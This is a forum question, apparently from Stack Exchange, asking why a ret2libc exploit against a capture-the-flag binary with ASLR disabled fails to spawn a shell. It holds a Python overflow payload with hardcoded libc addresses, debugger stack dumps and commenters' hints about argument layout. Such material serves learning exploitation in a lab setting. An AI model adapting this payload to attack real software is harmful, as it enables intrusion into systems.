0

I ran into this binary at a CTF : https://github.com/auehc/AUCTF-2020/tree/master/Pwn/House%20of%20Madness

I first tried to exploit it and get a shell using ret2libc technique, however I didn't succeed. I know it is not the intended way to solve the challenge, but after the CTF, I am now focusing on achieving ret2libc on this binary. And I am now stuck and need help :)

The source is in challenge.c, and the compiled version is challenge.

ASLR is disabled for the challenge, and on my computer too :

$ > cat /proc/sys/kernel/randomize_va_space
0

It is possible to trigger a buffer overflow using this input : 

"2\n4\n3\nStephen\n"

plus some padding.

I wrote an exploit to try to pop a shell (without success) :

#!/usr/bin/env python2

import struct

valid_input = "2\n4\n3\nStephen\n"
pad = "aaaaaaaa2Aa3Aa4Aa5Aa6Aa7aaaa"
binsh = struct.pack("I", 0xf7f4caaa)
system = struct.pack("I", 0xf7e0c9e0)
exit = struct.pack("<I", 0xf7dffa60)

exploit = valid_input \
        + pad \
        + system \
        + exit \
        + binsh
print exploit

Now, I will tell you why I don't understand why it's not working.

When i break on the ret in the function where I triggered the buffer overflow, the stack looks like this:

[0x56556684]> pxw 16 @esp
0xffffd23c  0xf7e0c9e0 0xf7dffa60 0xf7f4caaa 0xffffd200  ....`...........

so, you can see that first there is 0xf7e0c9e0, then 0xf7dffa60, then 0xf7f4caaa.

0xf7e0c9e0 is the address of system in the libc :

[0x56556684]> dmi libc system
257   0x0012a2c0 0xf7ef82c0 GLOBAL FUNC   102       svcerr_systemerr
658   0x0003e9e0 0xf7e0c9e0 GLOBAL FUNC   55        __libc_system
1525  0x0003e9e0 0xf7e0c9e0 WEAK   FUNC   55        system

0xf7dffa60 is the address of exit, altough it shouldn't be needed, if I popped the shell.

0xf7f4caaa is the address of the string /bin/sh\x00 in the libc :

[0x56556684]> px10@0xf7f4caaa
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0xf7f4caaa  2f62 696e 2f73 6800 6578                 /bin/sh.ex

I am stuck there, and can't figure out what is happening.. If anyone can point me in the right direction, I would be very happy :)

Improve this question
3
  • Why do you need exit address if you're not using it? when the ret instruction is executed, the system address is been popped out of the stack and the next 4 bytes are considered as the first argument of the function which, in this case, is exit address. try replacing it with the /bin/sh address, it should work. Commented Apr 11, 2020 at 10:34
  • @stylo Actually, the next 4 bytes are for the next return address after system, so exit will be called after system. What is happening when you try your payload? Commented Apr 29, 2020 at 17:23
  • Also see security.stackexchange.com/q/155844, could be your problem if addresses are correct. Commented Apr 29, 2020 at 17:25

0

Reset to default

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.